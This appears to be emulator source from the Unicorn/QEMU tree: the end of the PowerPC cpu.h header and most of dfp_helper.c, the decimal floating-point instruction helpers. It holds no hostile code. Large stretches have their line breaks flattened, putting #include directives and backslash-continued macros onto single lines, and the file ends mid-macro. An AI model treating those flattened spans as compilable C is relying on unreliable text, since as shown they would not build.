    if ((env->spr[SPR_MMUCFG] & MMUCFG_MAVN) == MMUCFG_MAVN_V2) {
        /* MAV2 */
        ret = env->spr[SPR_BOOKE_TLB0PS + tlbn];
    } else {
        uint32_t tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn];
        uint32_t min = (tlbncfg & TLBnCFG_MINSIZE) >> TLBnCFG_MINSIZE_SHIFT;
        uint32_t max = (tlbncfg & TLBnCFG_MAXSIZE) >> TLBnCFG_MAXSIZE_SHIFT;
        int i;

        for (i = min; i <= max; i++) {
            ret |= (1 << (i << 1));
        }
    }

    return ret;
}
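/*
 * The bitmap returned by booke206_tlbnps() has bit k set when the TLB
 * supports pages of 2^k KB (the MAV1 branch only sets even bits because
 * a MAV1 TSIZE of t encodes a 4^t KB = 2^(2t) KB page). A sketch of how
 * a caller might decode it (hypothetical helper, illustrative only):
 */
#if 0 /* illustrative sketch, not compiled */
static inline void example_dump_tlbnps(CPUPPCState *env, int tlbn)
{
    uint32_t ps = booke206_tlbnps(env, tlbn);
    int k;

    for (k = 0; k < 32; k++) {
        if (ps & (1u << k)) {
            /* e.g. k == 2 means 4 KB pages are supported */
            qemu_log("TLB%d supports %u KB pages\n", tlbn, 1u << k);
        }
    }
}
#endif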
static inline void booke206_fixed_size_tlbn(CPUPPCState *env, const int tlbn,
                                            ppcmas_tlb_t *tlb)
{
    uint8_t i;
    int32_t tsize = -1;

    for (i = 0; i < 32; i++) {
        if ((env->spr[SPR_BOOKE_TLB0PS + tlbn]) & (1ULL << i)) {
            if (tsize == -1) {
                tsize = i;
            } else {
                return;
            }
        }
    }

    /* TLBnPS unimplemented? Odd.. */
    assert(tsize != -1);
    tlb->mas1 &= ~MAS1_TSIZE_MASK;
    tlb->mas1 |= ((uint32_t)tsize) << MAS1_TSIZE_SHIFT;
}

static inline bool msr_is_64bit(CPUPPCState *env, target_ulong msr)
{
    if (env->mmu_model == POWERPC_MMU_BOOKE206) {
        return msr & (1ULL << MSR_CM);
    }

    return msr & (1ULL << MSR_SF);
}

/**
 * Check whether register rx is in the range between start and
 * start + nregs (as needed by the LSWX and LSWI instructions)
 */
static inline bool lsw_reg_in_range(int start, int nregs, int rx)
{
    return (start + nregs <= 32 && rx >= start && rx < start + nregs) ||
           (start + nregs > 32 && (rx >= start || rx < start + nregs - 32));
}

/* Accessors for FP, VMX and VSX registers */
#if defined(HOST_WORDS_BIGENDIAN)
#define VsrB(i) u8[i]
#define VsrSB(i) s8[i]
#define VsrH(i) u16[i]
#define VsrSH(i) s16[i]
#define VsrW(i) u32[i]
#define VsrSW(i) s32[i]
#define VsrD(i) u64[i]
#define VsrSD(i) s64[i]
#else
#define VsrB(i) u8[15 - (i)]
#define VsrSB(i) s8[15 - (i)]
#define VsrH(i) u16[7 - (i)]
#define VsrSH(i) s16[7 - (i)]
#define VsrW(i) u32[3 - (i)]
#define VsrSW(i) s32[3 - (i)]
#define VsrD(i) u64[1 - (i)]
#define VsrSD(i) s64[1 - (i)]
#endif

static inline int vsr64_offset(int i, bool high)
{
    return offsetof(CPUPPCState, vsr[i].VsrD(high ? 0 : 1));
}

static inline int vsr_full_offset(int i)
{
    return offsetof(CPUPPCState, vsr[i].u64[0]);
}

static inline int fpr_offset(int i)
{
    return vsr64_offset(i, true);
}

static inline uint64_t *cpu_fpr_ptr(CPUPPCState *env, int i)
{
    return (uint64_t *)((uintptr_t)env + fpr_offset(i));
}

static inline uint64_t *cpu_vsrl_ptr(CPUPPCState *env, int i)
{
    return (uint64_t *)((uintptr_t)env + vsr64_offset(i, false));
}

static inline long avr64_offset(int i, bool high)
{
    return vsr64_offset(i + 32, high);
}

static inline int avr_full_offset(int i)
{
    return vsr_full_offset(i + 32);
}

static inline ppc_avr_t *cpu_avr_ptr(CPUPPCState *env, int i)
{
    return (ppc_avr_t *)((uintptr_t)env + avr_full_offset(i));
}

void dump_mmu(CPUPPCState *env);

void ppc_maybe_bswap_register(CPUPPCState *env, uint8_t *mem_buf, int len);
#endif /* PPC_CPU_H */
unicorn-2.1.1/qemu/target/ppc/dfp_helper.c
/*
 * PowerPC Decimal Floating Point (DFP) emulation helpers for QEMU.
 *
 * Copyright (c) 2014 IBM Corporation.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #define DECNUMDIGITS 34 #include "libdecnumber/decContext.h" #include "libdecnumber/decNumber.h" #include "libdecnumber/dpd/decimal32.h" #include "libdecnumber/dpd/decimal64.h" #include "libdecnumber/dpd/decimal128.h" static void get_dfp64(ppc_vsr_t *dst, ppc_fprp_t *dfp) { dst->VsrD(1) = dfp->VsrD(0); } static void get_dfp128(ppc_vsr_t *dst, ppc_fprp_t *dfp) { dst->VsrD(0) = dfp[0].VsrD(0); dst->VsrD(1) = dfp[1].VsrD(0); } static void set_dfp64(ppc_fprp_t *dfp, ppc_vsr_t *src) { dfp->VsrD(0) = src->VsrD(1); } static void set_dfp128(ppc_fprp_t *dfp, ppc_vsr_t *src) { dfp[0].VsrD(0) = src->VsrD(0); dfp[1].VsrD(0) = src->VsrD(1); } struct PPC_DFP { CPUPPCState *env; ppc_vsr_t vt, va, vb; decNumber t, a, b; decContext context; uint8_t crbf; }; static void dfp_prepare_rounding_mode(decContext *context, uint64_t fpscr) { enum rounding rnd; switch ((fpscr & FP_DRN) >> FPSCR_DRN0) { case 0: rnd = DEC_ROUND_HALF_EVEN; break; case 1: rnd = DEC_ROUND_DOWN; break; case 2: rnd = DEC_ROUND_CEILING; break; case 3: rnd = DEC_ROUND_FLOOR; break; case 4: rnd = DEC_ROUND_HALF_UP; break; case 5: rnd = DEC_ROUND_HALF_DOWN; break; case 6: rnd = DEC_ROUND_UP; break; case 7: rnd = DEC_ROUND_05UP; break; default: g_assert_not_reached(); } decContextSetRounding(context, rnd); } static void dfp_set_round_mode_from_immediate(uint8_t r, uint8_t rmc, struct PPC_DFP *dfp) { enum rounding rnd; if (r == 0) { switch (rmc & 3) { case 0: rnd = DEC_ROUND_HALF_EVEN; break; case 1: rnd = DEC_ROUND_DOWN; break; case 2: rnd = DEC_ROUND_HALF_UP; break; case 3: /* use FPSCR rounding mode */ return; default: assert(0); /* cannot get here */ } } else { /* r == 1 */ switch (rmc & 3) { case 0: rnd = DEC_ROUND_CEILING; break; case 1: rnd = DEC_ROUND_FLOOR; break; case 2: rnd = DEC_ROUND_UP; break; case 3: rnd = DEC_ROUND_HALF_DOWN; break; default: assert(0); /* cannot get here */ } } decContextSetRounding(&dfp->context, rnd); } static void dfp_prepare_decimal64(struct PPC_DFP *dfp, ppc_fprp_t *a, ppc_fprp_t *b, CPUPPCState *env) { decContextDefault(&dfp->context, DEC_INIT_DECIMAL64); dfp_prepare_rounding_mode(&dfp->context, env->fpscr); dfp->env = env; if (a) { get_dfp64(&dfp->va, a); decimal64ToNumber((decimal64 *)&dfp->va.VsrD(1), &dfp->a); } else { dfp->va.VsrD(1) = 0; decNumberZero(&dfp->a); } if (b) { get_dfp64(&dfp->vb, b); decimal64ToNumber((decimal64 *)&dfp->vb.VsrD(1), &dfp->b); } else { dfp->vb.VsrD(1) = 0; decNumberZero(&dfp->b); } } static void dfp_prepare_decimal128(struct PPC_DFP *dfp, ppc_fprp_t *a, ppc_fprp_t *b, CPUPPCState *env) { decContextDefault(&dfp->context, DEC_INIT_DECIMAL128); dfp_prepare_rounding_mode(&dfp->context, env->fpscr); dfp->env = env; if (a) { get_dfp128(&dfp->va, a); decimal128ToNumber((decimal128 *)&dfp->va, &dfp->a); } else { dfp->va.VsrD(0) = dfp->va.VsrD(1) = 0; decNumberZero(&dfp->a); } if (b) { get_dfp128(&dfp->vb, b); decimal128ToNumber((decimal128 *)&dfp->vb, &dfp->b); } else { dfp->vb.VsrD(0) = dfp->vb.VsrD(1) = 0; decNumberZero(&dfp->b); } } static void dfp_finalize_decimal64(struct PPC_DFP *dfp) { decimal64FromNumber((decimal64 *)&dfp->vt.VsrD(1), &dfp->t, &dfp->context); } static void dfp_finalize_decimal128(struct PPC_DFP *dfp) { decimal128FromNumber((decimal128 *)&dfp->vt, &dfp->t, &dfp->context); } static void dfp_set_FPSCR_flag(struct PPC_DFP *dfp, uint64_t flag, uint64_t enabled) { dfp->env->fpscr |= (flag | FP_FX); if (dfp->env->fpscr & enabled) { dfp->env->fpscr |= FP_FEX; } } static void 
dfp_set_FPRF_from_FRT_with_context(struct PPC_DFP *dfp, decContext *context) { uint64_t fprf = 0; /* construct FPRF */ switch (decNumberClass(&dfp->t, context)) { case DEC_CLASS_SNAN: fprf = 0x01; break; case DEC_CLASS_QNAN: fprf = 0x11; break; case DEC_CLASS_NEG_INF: fprf = 0x09; break; case DEC_CLASS_NEG_NORMAL: fprf = 0x08; break; case DEC_CLASS_NEG_SUBNORMAL: fprf = 0x18; break; case DEC_CLASS_NEG_ZERO: fprf = 0x12; break; case DEC_CLASS_POS_ZERO: fprf = 0x02; break; case DEC_CLASS_POS_SUBNORMAL: fprf = 0x14; break; case DEC_CLASS_POS_NORMAL: fprf = 0x04; break; case DEC_CLASS_POS_INF: fprf = 0x05; break; default: assert(0); /* should never get here */ } dfp->env->fpscr &= ~FP_FPRF; dfp->env->fpscr |= (fprf << FPSCR_FPRF); } static void dfp_set_FPRF_from_FRT(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT_with_context(dfp, &dfp->context); } static void dfp_set_FPRF_from_FRT_short(struct PPC_DFP *dfp) { decContext shortContext; decContextDefault(&shortContext, DEC_INIT_DECIMAL32); dfp_set_FPRF_from_FRT_with_context(dfp, &shortContext); } static void dfp_set_FPRF_from_FRT_long(struct PPC_DFP *dfp) { decContext longContext; decContextDefault(&longContext, DEC_INIT_DECIMAL64); dfp_set_FPRF_from_FRT_with_context(dfp, &longContext); } static void dfp_check_for_OX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Overflow) { dfp_set_FPSCR_flag(dfp, FP_OX, FP_OE); } } static void dfp_check_for_UX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Underflow) { dfp_set_FPSCR_flag(dfp, FP_UX, FP_UE); } } static void dfp_check_for_XX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Inexact) { dfp_set_FPSCR_flag(dfp, FP_XX | FP_FI, FP_XE); } } static void dfp_check_for_ZX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Division_by_zero) { dfp_set_FPSCR_flag(dfp, FP_ZX, FP_ZE); } } static void dfp_check_for_VXSNAN(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Invalid_operation) { if (decNumberIsSNaN(&dfp->a) || decNumberIsSNaN(&dfp->b)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXSNAN, FP_VE); } } } static void dfp_check_for_VXSNAN_and_convert_to_QNaN(struct PPC_DFP *dfp) { if (decNumberIsSNaN(&dfp->t)) { dfp->t.bits &= ~DECSNAN; dfp->t.bits |= DECNAN; dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXSNAN, FP_VE); } } static void dfp_check_for_VXISI(struct PPC_DFP *dfp, int testForSameSign) { if (dfp->context.status & DEC_Invalid_operation) { if (decNumberIsInfinite(&dfp->a) && decNumberIsInfinite(&dfp->b)) { int same = decNumberClass(&dfp->a, &dfp->context) == decNumberClass(&dfp->b, &dfp->context); if ((same && testForSameSign) || (!same && !testForSameSign)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXISI, FP_VE); } } } } static void dfp_check_for_VXISI_add(struct PPC_DFP *dfp) { dfp_check_for_VXISI(dfp, 0); } static void dfp_check_for_VXISI_subtract(struct PPC_DFP *dfp) { dfp_check_for_VXISI(dfp, 1); } static void dfp_check_for_VXIMZ(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Invalid_operation) { if ((decNumberIsInfinite(&dfp->a) && decNumberIsZero(&dfp->b)) || (decNumberIsInfinite(&dfp->b) && decNumberIsZero(&dfp->a))) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXIMZ, FP_VE); } } } static void dfp_check_for_VXZDZ(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Division_undefined) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXZDZ, FP_VE); } } static void dfp_check_for_VXIDI(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Invalid_operation) { if (decNumberIsInfinite(&dfp->a) && decNumberIsInfinite(&dfp->b)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXIDI, FP_VE); } } } static void 
dfp_check_for_VXVC(struct PPC_DFP *dfp)
{
    if (decNumberIsNaN(&dfp->a) || decNumberIsNaN(&dfp->b)) {
        dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXVC, FP_VE);
    }
}

static void dfp_check_for_VXCVI(struct PPC_DFP *dfp)
{
    if ((dfp->context.status & DEC_Invalid_operation) &&
        (!decNumberIsSNaN(&dfp->a)) &&
        (!decNumberIsSNaN(&dfp->b))) {
        dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXCVI, FP_VE);
    }
}

static void dfp_set_CRBF_from_T(struct PPC_DFP *dfp)
{
    if (decNumberIsNaN(&dfp->t)) {
        dfp->crbf = 1;
    } else if (decNumberIsZero(&dfp->t)) {
        dfp->crbf = 2;
    } else if (decNumberIsNegative(&dfp->t)) {
        dfp->crbf = 8;
    } else {
        dfp->crbf = 4;
    }
}

static void dfp_set_FPCC_from_CRBF(struct PPC_DFP *dfp)
{
    dfp->env->fpscr &= ~FP_FPCC;
    dfp->env->fpscr |= (dfp->crbf << FPSCR_FPCC);
}

static inline void dfp_makeQNaN(decNumber *dn)
{
    dn->bits &= ~DECSPECIAL;
    dn->bits |= DECNAN;
}

static inline int dfp_get_digit(decNumber *dn, int n)
{
    assert(DECDPUN == 3);
    int unit = n / DECDPUN;
    int dig = n % DECDPUN;
    switch (dig) {
    case 0:
        return dn->lsu[unit] % 10;
    case 1:
        return (dn->lsu[unit] / 10) % 10;
    case 2:
        return dn->lsu[unit] / 100;
    }
    g_assert_not_reached();
}

#define DFP_HELPER_TAB(op, dnop, postprocs, size)                     \
void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a,      \
                 ppc_fprp_t *b)                                       \
{                                                                     \
    struct PPC_DFP dfp;                                               \
    dfp_prepare_decimal##size(&dfp, a, b, env);                       \
    dnop(&dfp.t, &dfp.a, &dfp.b, &dfp.context);                       \
    dfp_finalize_decimal##size(&dfp);                                 \
    postprocs(&dfp);                                                  \
    set_dfp##size(t, &dfp.vt);                                        \
}

static void ADD_PPs(struct PPC_DFP *dfp)
{
    dfp_set_FPRF_from_FRT(dfp);
    dfp_check_for_OX(dfp);
    dfp_check_for_UX(dfp);
    dfp_check_for_XX(dfp);
    dfp_check_for_VXSNAN(dfp);
    dfp_check_for_VXISI_add(dfp);
}

DFP_HELPER_TAB(dadd, decNumberAdd, ADD_PPs, 64)
DFP_HELPER_TAB(daddq, decNumberAdd, ADD_PPs, 128)

static void SUB_PPs(struct PPC_DFP *dfp)
{
    dfp_set_FPRF_from_FRT(dfp);
    dfp_check_for_OX(dfp);
    dfp_check_for_UX(dfp);
    dfp_check_for_XX(dfp);
    dfp_check_for_VXSNAN(dfp);
    dfp_check_for_VXISI_subtract(dfp);
}

DFP_HELPER_TAB(dsub, decNumberSubtract, SUB_PPs, 64)
DFP_HELPER_TAB(dsubq, decNumberSubtract, SUB_PPs, 128)

static void MUL_PPs(struct PPC_DFP *dfp)
{
    dfp_set_FPRF_from_FRT(dfp);
    dfp_check_for_OX(dfp);
    dfp_check_for_UX(dfp);
    dfp_check_for_XX(dfp);
    dfp_check_for_VXSNAN(dfp);
    dfp_check_for_VXIMZ(dfp);
}

DFP_HELPER_TAB(dmul, decNumberMultiply, MUL_PPs, 64)
DFP_HELPER_TAB(dmulq, decNumberMultiply, MUL_PPs, 128)

static void DIV_PPs(struct PPC_DFP *dfp)
{
    dfp_set_FPRF_from_FRT(dfp);
    dfp_check_for_OX(dfp);
    dfp_check_for_UX(dfp);
    dfp_check_for_ZX(dfp);
    dfp_check_for_XX(dfp);
    dfp_check_for_VXSNAN(dfp);
    dfp_check_for_VXZDZ(dfp);
    dfp_check_for_VXIDI(dfp);
}

DFP_HELPER_TAB(ddiv, decNumberDivide, DIV_PPs, 64)
DFP_HELPER_TAB(ddivq, decNumberDivide, DIV_PPs, 128)

#define DFP_HELPER_BF_AB(op, dnop, postprocs, size)                   \
uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, ppc_fprp_t *b)  \
{                                                                     \
    struct PPC_DFP dfp;                                               \
    dfp_prepare_decimal##size(&dfp, a, b, env);                       \
    dnop(&dfp.t, &dfp.a, &dfp.b, &dfp.context);                       \
    dfp_finalize_decimal##size(&dfp);                                 \
    postprocs(&dfp);                                                  \
    return dfp.crbf;                                                  \
}

static void CMPU_PPs(struct PPC_DFP *dfp)
{
    dfp_set_CRBF_from_T(dfp);
    dfp_set_FPCC_from_CRBF(dfp);
    dfp_check_for_VXSNAN(dfp);
}

DFP_HELPER_BF_AB(dcmpu, decNumberCompare, CMPU_PPs, 64)
DFP_HELPER_BF_AB(dcmpuq, decNumberCompare, CMPU_PPs, 128)

static void CMPO_PPs(struct PPC_DFP *dfp)
{
    dfp_set_CRBF_from_T(dfp);
    dfp_set_FPCC_from_CRBF(dfp);
    dfp_check_for_VXSNAN(dfp);
    dfp_check_for_VXVC(dfp);
}

DFP_HELPER_BF_AB(dcmpo, decNumberCompare, CMPO_PPs, 64)
DFP_HELPER_BF_AB(dcmpoq, decNumberCompare, CMPO_PPs, 128)
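/*
 * For reference, DFP_HELPER_TAB(dadd, decNumberAdd, ADD_PPs, 64) above
 * stamps out roughly the following helper (expansion shown by hand for
 * illustration; the macro generates the real one):
 */
#if 0 /* illustrative expansion, not compiled */
void helper_dadd(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a,
                 ppc_fprp_t *b)
{
    struct PPC_DFP dfp;
    dfp_prepare_decimal64(&dfp, a, b, env);
    decNumberAdd(&dfp.t, &dfp.a, &dfp.b, &dfp.context);
    dfp_finalize_decimal64(&dfp);
    ADD_PPs(&dfp);
    set_dfp64(t, &dfp.vt);
}
#endif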
#define DFP_HELPER_TSTDC(op, size)                                       \
uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, uint32_t dcm)      \
{                                                                        \
    struct PPC_DFP dfp;                                                  \
    int match = 0;                                                       \
                                                                         \
    dfp_prepare_decimal##size(&dfp, a, 0, env);                          \
                                                                         \
    match |= (dcm & 0x20) && decNumberIsZero(&dfp.a);                    \
    match |= (dcm & 0x10) && decNumberIsSubnormal(&dfp.a, &dfp.context); \
    match |= (dcm & 0x08) && decNumberIsNormal(&dfp.a, &dfp.context);    \
    match |= (dcm & 0x04) && decNumberIsInfinite(&dfp.a);                \
    match |= (dcm & 0x02) && decNumberIsQNaN(&dfp.a);                    \
    match |= (dcm & 0x01) && decNumberIsSNaN(&dfp.a);                    \
                                                                         \
    if (decNumberIsNegative(&dfp.a)) {                                   \
        dfp.crbf = match ? 0xA : 0x8;                                    \
    } else {                                                             \
        dfp.crbf = match ? 0x2 : 0x0;                                    \
    }                                                                    \
                                                                         \
    dfp_set_FPCC_from_CRBF(&dfp);                                        \
    return dfp.crbf;                                                     \
}

DFP_HELPER_TSTDC(dtstdc, 64)
DFP_HELPER_TSTDC(dtstdcq, 128)

#define DFP_HELPER_TSTDG(op, size)                                       \
uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, uint32_t dcm)      \
{                                                                        \
    struct PPC_DFP dfp;                                                  \
    int minexp, maxexp, nzero_digits, nzero_idx, is_negative, is_zero,   \
        is_extreme_exp, is_subnormal, is_normal, leftmost_is_nonzero,    \
        match;                                                           \
                                                                         \
    dfp_prepare_decimal##size(&dfp, a, 0, env);                          \
                                                                         \
    if ((size) == 64) {                                                  \
        minexp = -398;                                                   \
        maxexp = 369;                                                    \
        nzero_digits = 16;                                               \
        nzero_idx = 5;                                                   \
    } else if ((size) == 128) {                                          \
        minexp = -6176;                                                  \
        maxexp = 6111;                                                   \
        nzero_digits = 34;                                               \
        nzero_idx = 11;                                                  \
    }                                                                    \
                                                                         \
    is_negative = decNumberIsNegative(&dfp.a);                           \
    is_zero = decNumberIsZero(&dfp.a);                                   \
    is_extreme_exp = (dfp.a.exponent == maxexp) ||                       \
                     (dfp.a.exponent == minexp);                         \
    is_subnormal = decNumberIsSubnormal(&dfp.a, &dfp.context);           \
    is_normal = decNumberIsNormal(&dfp.a, &dfp.context);                 \
    leftmost_is_nonzero = (dfp.a.digits == nzero_digits) &&              \
                          (dfp.a.lsu[nzero_idx] != 0);                   \
    match = 0;                                                           \
                                                                         \
    match |= (dcm & 0x20) && is_zero && !is_extreme_exp;                 \
    match |= (dcm & 0x10) && is_zero && is_extreme_exp;                  \
    match |= (dcm & 0x08) &&                                             \
             (is_subnormal || (is_normal && is_extreme_exp));            \
    match |= (dcm & 0x04) && is_normal && !is_extreme_exp &&             \
             !leftmost_is_nonzero;                                       \
    match |= (dcm & 0x02) && is_normal && !is_extreme_exp &&             \
             leftmost_is_nonzero;                                        \
    match |= (dcm & 0x01) && decNumberIsSpecial(&dfp.a);                 \
                                                                         \
    if (is_negative) {                                                   \
        dfp.crbf = match ? 0xA : 0x8;                                    \
    } else {                                                             \
        dfp.crbf = match ? 0x2 : 0x0;                                    \
    }                                                                    \
                                                                         \
    dfp_set_FPCC_from_CRBF(&dfp);                                        \
    return dfp.crbf;                                                     \
}

DFP_HELPER_TSTDG(dtstdg, 64)
DFP_HELPER_TSTDG(dtstdgq, 128)

#define DFP_HELPER_TSTEX(op, size)                                       \
uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, ppc_fprp_t *b)     \
{                                                                        \
    struct PPC_DFP dfp;                                                  \
    int expa, expb, a_is_special, b_is_special;                          \
                                                                         \
    dfp_prepare_decimal##size(&dfp, a, b, env);                          \
                                                                         \
    expa = dfp.a.exponent;                                               \
    expb = dfp.b.exponent;                                               \
    a_is_special = decNumberIsSpecial(&dfp.a);                           \
    b_is_special = decNumberIsSpecial(&dfp.b);                           \
                                                                         \
    if (a_is_special || b_is_special) {                                  \
        int atype = a_is_special ? (decNumberIsNaN(&dfp.a) ? 4 : 2) : 1; \
        int btype = b_is_special ? (decNumberIsNaN(&dfp.b) ? 4 : 2) : 1; \
        dfp.crbf = (atype ^ btype) ?
0x1 : 0x2; \ } else if (expa < expb) { \ dfp.crbf = 0x8; \ } else if (expa > expb) { \ dfp.crbf = 0x4; \ } else { \ dfp.crbf = 0x2; \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTEX(dtstex, 64) DFP_HELPER_TSTEX(dtstexq, 128) #define DFP_HELPER_TSTSF(op, size) \ uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ unsigned k; \ ppc_vsr_t va; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ get_dfp64(&va, a); \ k = va.VsrD(1) & 0x3F; \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ dfp.crbf = 1; \ } else if (k == 0) { \ dfp.crbf = 4; \ } else if (unlikely(decNumberIsZero(&dfp.b))) { \ /* Zero has no sig digits */ \ dfp.crbf = 4; \ } else { \ unsigned nsd = dfp.b.digits; \ if (k < nsd) { \ dfp.crbf = 8; \ } else if (k > nsd) { \ dfp.crbf = 4; \ } else { \ dfp.crbf = 2; \ } \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTSF(dtstsf, 64) DFP_HELPER_TSTSF(dtstsfq, 128) #define DFP_HELPER_TSTSFI(op, size) \ uint32_t helper_##op(CPUPPCState *env, uint32_t a, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ unsigned uim; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ uim = a & 0x3F; \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ dfp.crbf = 1; \ } else if (uim == 0) { \ dfp.crbf = 4; \ } else if (unlikely(decNumberIsZero(&dfp.b))) { \ /* Zero has no sig digits */ \ dfp.crbf = 4; \ } else { \ unsigned nsd = dfp.b.digits; \ if (uim < nsd) { \ dfp.crbf = 8; \ } else if (uim > nsd) { \ dfp.crbf = 4; \ } else { \ dfp.crbf = 2; \ } \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTSFI(dtstsfi, 64) DFP_HELPER_TSTSFI(dtstsfiq, 128) static void QUA_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXCVI(dfp); } static void dfp_quantize(uint8_t rmc, struct PPC_DFP *dfp) { dfp_set_round_mode_from_immediate(0, rmc, dfp); decNumberQuantize(&dfp->t, &dfp->b, &dfp->a, &dfp->context); if (decNumberIsSNaN(&dfp->a)) { dfp->t = dfp->a; dfp_makeQNaN(&dfp->t); } else if (decNumberIsSNaN(&dfp->b)) { dfp->t = dfp->b; dfp_makeQNaN(&dfp->t); } else if (decNumberIsQNaN(&dfp->a)) { dfp->t = dfp->a; } else if (decNumberIsQNaN(&dfp->b)) { dfp->t = dfp->b; } } #define DFP_HELPER_QUAI(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t te, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ decNumberFromUInt32(&dfp.a, 1); \ dfp.a.exponent = (int32_t)((int8_t)(te << 3) >> 3); \ \ dfp_quantize(rmc, &dfp); \ dfp_finalize_decimal##size(&dfp); \ QUA_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_QUAI(dquai, 64) DFP_HELPER_QUAI(dquaiq, 128) #define DFP_HELPER_QUA(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ \ dfp_prepare_decimal##size(&dfp, a, b, env); \ \ dfp_quantize(rmc, &dfp); \ dfp_finalize_decimal##size(&dfp); \ QUA_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_QUA(dqua, 64) DFP_HELPER_QUA(dquaq, 128) static void _dfp_reround(uint8_t rmc, int32_t ref_sig, int32_t xmax, struct PPC_DFP *dfp) { int msd_orig, msd_rslt; if (unlikely((ref_sig == 0) || (dfp->b.digits <= ref_sig))) { dfp->t = dfp->b; if (decNumberIsSNaN(&dfp->b)) { dfp_makeQNaN(&dfp->t); dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXSNAN, FPSCR_VE); } return; } /* Reround is equivalent to quantizing b with 1**E(n) where */ /* n = exp(b) + numDigits(b) - reference_significance. 
*/ decNumberFromUInt32(&dfp->a, 1); dfp->a.exponent = dfp->b.exponent + dfp->b.digits - ref_sig; if (unlikely(dfp->a.exponent > xmax)) { dfp->t.digits = 0; dfp->t.bits &= ~DECNEG; dfp_makeQNaN(&dfp->t); dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXCVI, FPSCR_VE); return; } dfp_quantize(rmc, dfp); msd_orig = dfp_get_digit(&dfp->b, dfp->b.digits-1); msd_rslt = dfp_get_digit(&dfp->t, dfp->t.digits-1); /* If the quantization resulted in rounding up to the next magnitude, */ /* then we need to shift the significand and adjust the exponent. */ if (unlikely((msd_orig == 9) && (msd_rslt == 1))) { decNumber negone; decNumberFromInt32(&negone, -1); decNumberShift(&dfp->t, &dfp->t, &negone, &dfp->context); dfp->t.exponent++; if (unlikely(dfp->t.exponent > xmax)) { dfp_makeQNaN(&dfp->t); dfp->t.digits = 0; dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXCVI, FP_VE); /* Inhibit XX in this case */ decContextClearStatus(&dfp->context, DEC_Inexact); } } } #define DFP_HELPER_RRND(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ ppc_vsr_t va; \ int32_t ref_sig; \ int32_t xmax = ((size) == 64) ? 369 : 6111; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ get_dfp64(&va, a); \ ref_sig = va.VsrD(1) & 0x3f; \ \ _dfp_reround(rmc, ref_sig, xmax, &dfp); \ dfp_finalize_decimal##size(&dfp); \ QUA_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_RRND(drrnd, 64) DFP_HELPER_RRND(drrndq, 128) #define DFP_HELPER_RINT(op, postprocs, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t r, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ dfp_set_round_mode_from_immediate(r, rmc, &dfp); \ decNumberToIntegralExact(&dfp.t, &dfp.b, &dfp.context); \ dfp_finalize_decimal##size(&dfp); \ postprocs(&dfp); \ \ 